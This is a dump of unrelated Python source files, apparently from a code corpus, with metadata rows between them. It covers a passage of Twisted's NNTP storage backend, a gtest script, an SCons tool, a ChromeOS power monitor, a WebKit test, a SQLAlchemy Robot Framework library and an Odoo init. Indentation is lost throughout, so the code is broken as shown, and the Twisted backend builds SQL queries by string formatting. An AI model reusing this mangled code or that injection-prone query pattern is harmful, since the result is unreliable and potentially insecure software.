def headRequest(self, group, index, id = None):
if id is not None:
try:
xref = self.dbm['Message-IDs'][id]
except KeyError:
return defer.fail(NewsServerError("No such article: " + id))
else:
group, index = xref[0]
index = int(index)
try:
a = self.dbm['groups'][group].articles[index]
except KeyError:
return defer.fail(NewsServerError("No such group: " + group))
else:
return defer.succeed((index, a.getHeader('Message-ID'), a.textHeaders()))
def bodyRequest(self, group, index, id = None):
if id is not None:
try:
xref = self.dbm['Message-IDs'][id]
except KeyError:
return defer.fail(NewsServerError("No such article: " + id))
else:
group, index = xref[0]
index = int(index)
try:
a = self.dbm['groups'][group].articles[index]
except KeyError:
return defer.fail(NewsServerError("No such group: " + group))
else:
return defer.succeed((index, a.getHeader('Message-ID'), StringIO.StringIO(a.body)))
class NewsStorageAugmentation:
"""
A NewsStorage implementation using Twisted's asynchronous DB-API
"""
implements(INewsStorage)
schema = """
CREATE TABLE groups (
group_id SERIAL,
name VARCHAR(80) NOT NULL,
flags INTEGER DEFAULT 0 NOT NULL
);
CREATE UNIQUE INDEX group_id_index ON groups (group_id);
CREATE UNIQUE INDEX name_id_index ON groups (name);
CREATE TABLE articles (
article_id SERIAL,
message_id TEXT,
header TEXT,
body TEXT
);
CREATE UNIQUE INDEX article_id_index ON articles (article_id);
CREATE UNIQUE INDEX article_message_index ON articles (message_id);
CREATE TABLE postings (
group_id INTEGER,
article_id INTEGER,
article_index INTEGER NOT NULL
);
CREATE UNIQUE INDEX posting_article_index ON postings (article_id);
CREATE TABLE subscriptions (
group_id INTEGER
);
CREATE TABLE overview (
header TEXT
);
"""
def __init__(self, info):
self.info = info
self.dbpool = adbapi.ConnectionPool(**self.info)
def __setstate__(self, state):
self.__dict__ = state
self.info['password'] = getpass.getpass('Database password for %s: ' % (self.info['user'],))
self.dbpool = adbapi.ConnectionPool(**self.info)
del self.info['password']
def listRequest(self):
# COALESCE may not be totally portable
# it is shorthand for
# CASE WHEN (first parameter) IS NOT NULL then (first parameter) ELSE (second parameter) END
sql = """
SELECT groups.name,
COALESCE(MAX(postings.article_index), 0),
COALESCE(MIN(postings.article_index), 0),
groups.flags
FROM groups LEFT OUTER JOIN postings
ON postings.group_id = groups.group_id
GROUP BY groups.name, groups.flags
ORDER BY groups.name
"""
return self.dbpool.runQuery(sql)
def subscriptionRequest(self):
sql = """
SELECT groups.name FROM groups,subscriptions WHERE groups.group_id = subscriptions.group_id
"""
return self.dbpool.runQuery(sql)
def postRequest(self, message):
cleave = message.find('\r\n\r\n')
headers, article = message[:cleave], message[cleave + 4:]
article = Article(headers, article)
return self.dbpool.runInteraction(self._doPost, article)
def _doPost(self, transaction, article):
# Get the group ids
groups = article.getHeader('Newsgroups').split()
if not len(groups):
raise NNTPError('Missing Newsgroups header')
sql = """
SELECT name, group_id FROM groups
WHERE name IN (%s)
""" % (', '.join([("'%s'" % (adbapi.safe(group),)) for group in groups]),)
transaction.execute(sql)
result = transaction.fetchall()
# No relevant groups, bye bye!
if not len(result):
raise NNTPError('None of groups in Newsgroup header carried')
# Got some groups, now find the indices this article will have in each
sql = """
SELECT groups.group_id, COALESCE(MAX(postings.article_index), 0) + 1
FROM groups LEFT OUTER JOIN postings
ON postings.group_id = groups.group_id
WHERE groups.group_id IN (%s)
GROUP BY groups.group_id
""" % (', '.join([("%d" % (id,)) for (group, id) in result]),)
transaction.execute(sql)
indices = transaction.fetchall()
if not len(indices):
raise NNTPError('Internal server error - no indices found')
# Associate indices with group names
gidToName = dict([(b, a) for (a, b) in result])
gidToIndex = dict(indices)
nameIndex = []
for i in gidToName:
nameIndex.append((gidToName[i], gidToIndex[i]))
# Build xrefs
xrefs = socket.gethostname().split()[0]
xrefs = xrefs + ' ' + ' '.join([('%s:%d' % (group, id)) for (group, id) in nameIndex])
article.putHeader('Xref', xrefs)
# Hey! The article is ready to be posted! God damn f'in finally.
sql = """
INSERT INTO articles (message_id, header, body)
VALUES ('%s', '%s', '%s')
""" % (
adbapi.safe(article.getHeader('Message-ID')),
adbapi.safe(article.textHeaders()),
adbapi.safe(article.body)
)
transaction.execute(sql)
# Now update the posting to reflect the groups to which this belongs
for gid in gidToName:
sql = """
INSERT INTO postings (group_id, article_id, article_index)
VALUES (%d, (SELECT last_value FROM articles_article_id_seq), %d)
""" % (gid, gidToIndex[gid])
transaction.execute(sql)
return len(nameIndex)
def overviewRequest(self):
sql = """
SELECT header FROM overview
"""
return self.dbpool.runQuery(sql).addCallback(lambda result: [header[0] for header in result])
def xoverRequest(self, group, low, high):
sql = """
SELECT postings.article_index, articles.header
FROM articles,postings,groups
WHERE postings.group_id = groups.group_id
AND groups.name = '%s'
AND postings.article_id = articles.article_id
%s
%s
""" % (
adbapi.safe(group),
low is not None and "AND postings.article_index >= %d" % (low,) or "",
high is not None and "AND postings.article_index <= %d" % (high,) or ""
)
return self.dbpool.runQuery(sql).addCallback(
lambda results: [
[id] + Article(header, None).overview() for (id, header) in results
]
)
def xhdrRequest(self, group, low, high, header):
sql = """
SELECT articles.header
FROM groups,postings,articles
WHERE groups.name = '%s' AND postings.group_id = groups.group_id
AND postings.article_index >= %d
AND postings.article_index <= %d
""" % (adbapi.safe(group), low, high)
return self.dbpool.runQuery(sql).addCallback(
lambda results: [
(i, Article(h, None).getHeader(h)) for (i, h) in results
]
)
def listGroupRequest(self, group):
sql = """
SELECT postings.article_index FROM postings,groups
WHERE postings.group_id = groups.group_id
AND groups.name = '%s'
""" % (adbapi.safe(group),)
return self.dbpool.runQuery(sql).addCallback(
lambda results, group = group: (group, [res[0] for res in results])
)
def groupRequest(self, group):
sql = """
SELECT groups.name,
COUNT(postings.article_index),
COALESCE(MAX(postings.article_index), 0),
COALESCE(MIN(postings.article_index), 0),
groups.flags
FROM groups LEFT OUTER JOIN postings
ON postings.group_id = groups.group_id
WHERE groups.name = '%s'
GROUP BY groups.name, groups.flags
""" % (adbapi.safe(group),)
return self.dbpool.runQuery(sql).addCallback(
lambda results: tuple(results[0])
)
def articleExistsRequest(self, id):
sql = """
SELECT COUNT(message_id) FROM articles
WHERE message_id = '%s'
""" % (adbapi.safe(id),)
return self.dbpool.runQuery(sql).addCallback(
lambda result: bool(result[0][0])
)
def articleRequest(self, group, index, id = None):
if id is not None:
sql = """
SELECT postings.article_index, articles.message_id, articles.header, articles.body
FROM groups,postings LEFT OUTER JOIN articles
ON articles.message_id = '%s'
WHERE groups.name = '%s'
AND groups.group_id = postings.group_id
""" % (adbapi.safe(id), adbapi.safe(group))
else:
sql = """
SELECT postings.article_index, articles.message_id, articles.header, articles.body
FROM groups,articles LEFT OUTER JOIN postings
ON postings.article_id = articles.article_id
WHERE postings.article_index = %d
AND postings.group_id = groups.group_id
AND groups.name = '%s'
""" % (index, adbapi.safe(group))
return self.dbpool.runQuery(sql).addCallback(
lambda result: (
result[0][0],
result[0][1],
StringIO.StringIO(result[0][2] + '\r\n' + result[0][3])
)
)
def headRequest(self, group, index):
sql = """
SELECT postings.article_index, articles.message_id, articles.header
FROM groups,articles LEFT OUTER JOIN postings
ON postings.article_id = articles.article_id
WHERE postings.article_index = %d
AND postings.group_id = groups.group_id
AND groups.name = '%s'
""" % (index, adbapi.safe(group))
return self.dbpool.runQuery(sql).addCallback(lambda result: result[0])
def bodyRequest(self, group, index):
sql = """
SELECT postings.article_index, articles.message_id, articles.body
FROM groups,articles LEFT OUTER JOIN postings
ON postings.article_id = articles.article_id
WHERE postings.article_index = %d
AND postings.group_id = groups.group_id
AND groups.name = '%s'
""" % (index, adbapi.safe(group))
return self.dbpool.runQuery(sql).addCallback(
lambda result: result[0]
).addCallback(
lambda (index, id, body): (index, id, StringIO.StringIO(body))
)
####
#### XXX - make these static methods some day
####
def makeGroupSQL(groups):
res = ''
for g in groups:
res = res + """\n INSERT INTO groups (name) VALUES ('%s');\n""" % (adbapi.safe(g),)
return res
def makeOverviewSQL():
res = ''
for o in OVERVIEW_FMT:
res = res + """\n INSERT INTO overview (header) VALUES ('%s');\n""" % (adbapi.safe(o),)
return res
| apache-2.0 | -6,870,076,587,363,132,000 | 1,682,258,409,642,480,600 | 31.105614 | 122 | 0.568266 | false |
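
NewsShelf above is the dirdbm-backed INewsStorage implementation; groups are registered up front and postRequest() files an article into every carried group. A hedged sketch follows; the mail host, storage path, group and article text are placeholders.

# Illustrative sketch; mailhost, path, group and message text are placeholders.
from twisted.news.database import NewsShelf

shelf = NewsShelf('localhost', 'newsdb', sender='[email protected]')  # creates the 'newsdb' directory
shelf.addGroup('alt.test', 'y')
shelf.addSubscription('alt.test')

article = ("From: [email protected]\r\n"
           "Newsgroups: alt.test\r\n"
           "Subject: hello\r\n"
           "\r\n"
           "First post.\r\n")

d = shelf.postRequest(article)            # Deferred; fires once the article is filed
d.addCallback(lambda _: shelf.listRequest())
# the next callback receives [(group, maxArticle, minArticle, flags)] tuples
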
Dellware78/mtasa-blue | vendor/google-breakpad/src/third_party/protobuf/protobuf/gtest/test/gtest_throw_on_failure_test.py | 2917 | 5766 | #!/usr/bin/env python
#
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests Google Test's throw-on-failure mode with exceptions disabled.
This script invokes gtest_throw_on_failure_test_ (a program written with
Google Test) with different environments and command line flags.
"""
__author__ = '[email protected] (Zhanyong Wan)'
import os
import gtest_test_utils
# Constants.
# The command line flag for enabling/disabling the throw-on-failure mode.
THROW_ON_FAILURE = 'gtest_throw_on_failure'
# Path to the gtest_throw_on_failure_test_ program, compiled with
# exceptions disabled.
EXE_PATH = gtest_test_utils.GetTestExecutablePath(
'gtest_throw_on_failure_test_')
# Utilities.
def SetEnvVar(env_var, value):
"""Sets an environment variable to a given value; unsets it when the
given value is None.
"""
env_var = env_var.upper()
if value is not None:
os.environ[env_var] = value
elif env_var in os.environ:
del os.environ[env_var]
def Run(command):
"""Runs a command; returns True/False if its exit code is/isn't 0."""
print 'Running "%s". . .' % ' '.join(command)
p = gtest_test_utils.Subprocess(command)
return p.exited and p.exit_code == 0
# The tests. TODO([email protected]): refactor the class to share common
# logic with code in gtest_break_on_failure_unittest.py.
class ThrowOnFailureTest(gtest_test_utils.TestCase):
"""Tests the throw-on-failure mode."""
def RunAndVerify(self, env_var_value, flag_value, should_fail):
"""Runs gtest_throw_on_failure_test_ and verifies that it does
(or does not) exit with a non-zero code.
Args:
      env_var_value: value of the GTEST_THROW_ON_FAILURE environment
          variable; None if the variable should be unset.
      flag_value: value of the --gtest_throw_on_failure flag;
          None if the flag should not be present.
should_fail: True iff the program is expected to fail.
"""
SetEnvVar(THROW_ON_FAILURE, env_var_value)
if env_var_value is None:
env_var_value_msg = ' is not set'
else:
env_var_value_msg = '=' + env_var_value
if flag_value is None:
flag = ''
elif flag_value == '0':
flag = '--%s=0' % THROW_ON_FAILURE
else:
flag = '--%s' % THROW_ON_FAILURE
command = [EXE_PATH]
if flag:
command.append(flag)
if should_fail:
should_or_not = 'should'
else:
should_or_not = 'should not'
failed = not Run(command)
SetEnvVar(THROW_ON_FAILURE, None)
msg = ('when %s%s, an assertion failure in "%s" %s cause a non-zero '
'exit code.' %
(THROW_ON_FAILURE, env_var_value_msg, ' '.join(command),
should_or_not))
self.assert_(failed == should_fail, msg)
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(env_var_value=None, flag_value=None, should_fail=False)
def testThrowOnFailureEnvVar(self):
"""Tests using the GTEST_THROW_ON_FAILURE environment variable."""
self.RunAndVerify(env_var_value='0',
flag_value=None,
should_fail=False)
self.RunAndVerify(env_var_value='1',
flag_value=None,
should_fail=True)
def testThrowOnFailureFlag(self):
"""Tests using the --gtest_throw_on_failure flag."""
self.RunAndVerify(env_var_value=None,
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value=None,
flag_value='1',
should_fail=True)
def testThrowOnFailureFlagOverridesEnvVar(self):
"""Tests that --gtest_throw_on_failure overrides GTEST_THROW_ON_FAILURE."""
self.RunAndVerify(env_var_value='0',
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value='0',
flag_value='1',
should_fail=True)
self.RunAndVerify(env_var_value='1',
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value='1',
flag_value='1',
should_fail=True)
if __name__ == '__main__':
gtest_test_utils.Main()
| gpl-3.0 | 8,861,283,259,795,622,000 | -5,521,466,778,592,229,000 | 32.719298 | 79 | 0.656261 | false |
gladk/palabos | scons/scons-local-2.1.0/SCons/Tool/sgicc.py | 21 | 1878 | """SCons.Tool.sgicc
Tool-specific initialization for MIPSPro cc on SGI.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/sgicc.py 5357 2011/09/09 21:31:03 bdeegan"
import cc
def generate(env):
"""Add Builders and construction variables for gcc to an Environment."""
cc.generate(env)
env['CXX'] = 'CC'
env['SHOBJSUFFIX'] = '.o'
env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 1
def exists(env):
return env.Detect('cc')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| agpl-3.0 | 5,933,395,459,477,644,000 | 6,928,681,499,985,229,000 | 34.433962 | 101 | 0.741747 | false |
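
The tool module above follows the standard SCons generate()/exists() pair and layers the SGI MIPSPro specifics on top of the generic cc tool. A hedged SConstruct sketch selecting it explicitly; the target and source names are placeholders.

# Illustrative SConstruct sketch; source and target names are placeholders.
env = Environment(tools=['sgicc'])     # cc defaults first, then the SGI overrides
env.Program('hello', ['hello.c'])
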
hujiajie/chromium-crosswalk | tools/telemetry/telemetry/internal/platform/power_monitor/cros_power_monitor.py | 17 | 6081 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import logging
import re
from telemetry import decorators
from telemetry.internal.platform.power_monitor import sysfs_power_monitor
class CrosPowerMonitor(sysfs_power_monitor.SysfsPowerMonitor):
"""PowerMonitor that relies on 'dump_power_status' to monitor power
consumption of a single ChromeOS application.
"""
def __init__(self, platform_backend):
"""Constructor.
Args:
platform_backend: A LinuxBasedPlatformBackend object.
Attributes:
_initial_power: The result of 'dump_power_status' before the test.
_start_time: The epoch time at which the test starts executing.
"""
super(CrosPowerMonitor, self).__init__(platform_backend)
self._initial_power = None
self._start_time = None
@decorators.Cache
def CanMonitorPower(self):
return super(CrosPowerMonitor, self).CanMonitorPower()
def StartMonitoringPower(self, browser):
super(CrosPowerMonitor, self).StartMonitoringPower(browser)
if self._IsOnBatteryPower():
sample = self._platform.RunCommand(['dump_power_status;', 'date', '+%s'])
self._initial_power, self._start_time = CrosPowerMonitor.SplitSample(
sample)
else:
logging.warning('Device not on battery power during power monitoring. '
'Results may be incorrect.')
def StopMonitoringPower(self):
# Don't need to call self._CheckStop here; it's called by the superclass
cpu_stats = super(CrosPowerMonitor, self).StopMonitoringPower()
power_stats = {}
if self._IsOnBatteryPower():
sample = self._platform.RunCommand(['dump_power_status;', 'date', '+%s'])
final_power, end_time = CrosPowerMonitor.SplitSample(sample)
# The length of the test is used to measure energy consumption.
length_h = (end_time - self._start_time) / 3600.0
power_stats = CrosPowerMonitor.ParsePower(self._initial_power,
final_power, length_h)
else:
logging.warning('Device not on battery power during power monitoring. '
'Results may be incorrect.')
return CrosPowerMonitor.CombineResults(cpu_stats, power_stats)
@staticmethod
def SplitSample(sample):
"""Splits a power and time sample into the two separate values.
Args:
sample: The result of calling 'dump_power_status; date +%s' on the
device.
Returns:
A tuple of power sample and epoch time of the sample.
"""
sample = sample.strip()
index = sample.rfind('\n')
power = sample[:index]
time = sample[index + 1:]
return power, int(time)
@staticmethod
def IsOnBatteryPower(status, board):
"""Determines if the devices is being charged.
Args:
status: The parsed result of 'dump_power_status'
board: The name of the board running the test.
Returns:
True if the device is on battery power; False otherwise.
"""
on_battery = status['line_power_connected'] == '0'
# Butterfly can incorrectly report AC online for some time after unplug.
# Check battery discharge state to confirm.
if board == 'butterfly':
on_battery |= status['battery_discharging'] == '1'
return on_battery
def _IsOnBatteryPower(self):
"""Determines if the device is being charged.
Returns:
True if the device is on battery power; False otherwise.
"""
status = CrosPowerMonitor.ParsePowerStatus(
self._platform.RunCommand(['dump_power_status']))
board_data = self._platform.RunCommand(['cat', '/etc/lsb-release'])
board = re.search('BOARD=(.*)', board_data).group(1)
return CrosPowerMonitor.IsOnBatteryPower(status, board)
@staticmethod
def ParsePowerStatus(sample):
"""Parses 'dump_power_status' command output.
Args:
sample: The output of 'dump_power_status'
Returns:
Dictionary containing all fields from 'dump_power_status'
"""
rv = collections.defaultdict(dict)
for ln in sample.splitlines():
words = ln.split()
assert len(words) == 2
rv[words[0]] = words[1]
return dict(rv)
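  # A minimal sketch of the expected input/output, assuming 'dump_power_status'
  # prints one 'key value' pair per line (the field names are hypothetical but
  # mirror the ones used elsewhere in this class):
  #
  #   CrosPowerMonitor.ParsePowerStatus(
  #       'line_power_connected 0\nbattery_energy_rate 5.43\n')
  #   # -> {'line_power_connected': '0', 'battery_energy_rate': '5.43'}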
@staticmethod
def ParsePower(initial_stats, final_stats, length_h):
"""Parse output of 'dump_power_status'
Args:
initial_stats: The output of 'dump_power_status' before the test.
final_stats: The output of 'dump_power_status' after the test.
length_h: The length of the test in hours.
Returns:
Dictionary in the format returned by StopMonitoringPower().
"""
initial = CrosPowerMonitor.ParsePowerStatus(initial_stats)
final = CrosPowerMonitor.ParsePowerStatus(final_stats)
# The charge value reported by 'dump_power_status' is not precise enough to
# give meaningful results across shorter tests, so average energy rate and
# the length of the test are used.
initial_power_mw = float(initial['battery_energy_rate']) * 10 ** 3
final_power_mw = float(final['battery_energy_rate']) * 10 ** 3
average_power_mw = (initial_power_mw + final_power_mw) / 2.0
# Duplicating CrOS battery fields where applicable.
def CopyFinalState(field, key):
"""Copy fields from battery final state."""
if field in final:
battery[key] = float(final[field])
battery = {}
CopyFinalState('battery_charge_full', 'charge_full')
CopyFinalState('battery_charge_full_design', 'charge_full_design')
CopyFinalState('battery_charge', 'charge_now')
CopyFinalState('battery_current', 'current_now')
CopyFinalState('battery_energy', 'energy')
CopyFinalState('battery_energy_rate', 'energy_rate')
CopyFinalState('battery_voltage', 'voltage_now')
return {'identifier': 'dump_power_status',
'power_samples_mw': [initial_power_mw, final_power_mw],
'energy_consumption_mwh': average_power_mw * length_h,
'component_utilization': {'battery': battery}}
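# A minimal end-to-end sketch, assuming a LinuxBasedPlatformBackend instance
# ('backend') and a browser object ('browser'); both names are placeholders
# and are not defined in this module:
#
#   monitor = CrosPowerMonitor(backend)
#   if monitor.CanMonitorPower():
#     monitor.StartMonitoringPower(browser)
#     # ... drive the workload under test ...
#     results = monitor.StopMonitoringPower()
#     # When the device was on battery power, the combined results include the
#     # power stats parsed above (e.g. 'energy_consumption_mwh').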
| bsd-3-clause | 6,197,737,673,767,238,000 | 6,857,741,420,832,155,000 | 36.079268 | 79 | 0.672587 | false |
dongritengfei/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/bot/botinfo_unittest.py | 121 | 2047 | # Copyright (c) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.tool.bot.botinfo import BotInfo
from webkitpy.tool.mocktool import MockTool
from webkitpy.common.net.statusserver_mock import MockStatusServer
from webkitpy.port.test import TestPort
class BotInfoTest(unittest.TestCase):
def test_summary_text(self):
tool = MockTool()
tool.status_server = MockStatusServer("MockBotId")
self.assertEqual(BotInfo(tool, 'port-name').summary_text(), "Bot: MockBotId Port: port-name Platform: MockPlatform 1.0")
| bsd-3-clause | 3,395,046,546,986,176,500 | 8,590,087,076,291,345,000 | 47.738095 | 130 | 0.776746 | false |
edbrannin/Robotframework-SQLAlchemy-Library | src/SQLAlchemyLibrary/__init__.py | 1 | 2769 | # Copyright (c) 2010 Franz Allan Valencia See
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from SQLAlchemyLibrary.connection_manager import ConnectionManager
from SQLAlchemyLibrary.query import Query
from SQLAlchemyLibrary.assertion import Assertion
__version_file_path__ = os.path.join(os.path.dirname(__file__), 'VERSION')
__version__ = open(__version_file_path__, 'r').read().strip()
class SQLAlchemyLibrary(ConnectionManager, Query, Assertion):
"""
SQLAlchemy Library allows you to interact with your database in Robot Framework tests.
    This allows you to query your database after an action has been performed and verify the results.
    It works with any database supported by SQLAlchemy, including Oracle, MySQL, Postgres, and SQLite.
(Not yet tested on Oracle).
This should be a drop-in replacement for DatabaseLibrary in most situations.
Advantages over DatabaseLibrary
- Ability to provide named-parameter BIND values
== References: ==
- SQLAlchemy documentation - http://docs.sqlalchemy.org/en/latest/index.html
- List of SQLAlchemy Dialects - http://docs.sqlalchemy.org/en/latest/dialects/
- Python Database Programming - http://wiki.python.org/moin/DatabaseProgramming/
== Notes: ==
=== Example Usage: ===
| # Setup |
| Connect to Database |
| # Guard assertion (verify that test started in expected state). |
    | Check if not exists in database | select id from person where first_name = :first_name and last_name = :last_name | first_name=Franz Allan | last_name=See |
| # Drive UI to do some action |
| Go To | http://localhost/person/form.html | | # From selenium library |
| Input Text | name=first_name | Franz Allan | # From selenium library |
| Input Text | name=last_name | See | # From selenium library |
| Click Button | Save | | # From selenium library |
| # Log results |
| @{queryResults} | Query | select * from person |
| Log Many | @{queryResults} |
| # Verify if persisted in the database |
| Check if exists in database | select id from person where first_name = 'Franz Allan' and last_name = 'See' |
| # Teardown |
| Disconnect from Database |
"""
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
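# A minimal sketch of the named-parameter binds advertised above, expressed in
# plain SQLAlchemy (the engine URL and table are hypothetical; the library's
# keywords presumably delegate to something similar):
#
#   from sqlalchemy import create_engine, text
#   engine = create_engine('sqlite:///:memory:')
#   with engine.connect() as conn:
#       rows = conn.execute(
#           text("select id from person where first_name = :first_name"),
#           {'first_name': 'Franz Allan'}).fetchall()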
| apache-2.0 | -1,758,234,698,115,044,600 | -8,969,978,495,616,452,000 | 39.130435 | 162 | 0.701697 | false |
sv-dev1/odoo | addons/mrp_repair/__init__.py | 380 | 1087 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import mrp_repair
import wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 2,144,954,692,983,241,000 | 2,576,444,078,874,443,300 | 42.48 | 79 | 0.612695 | false |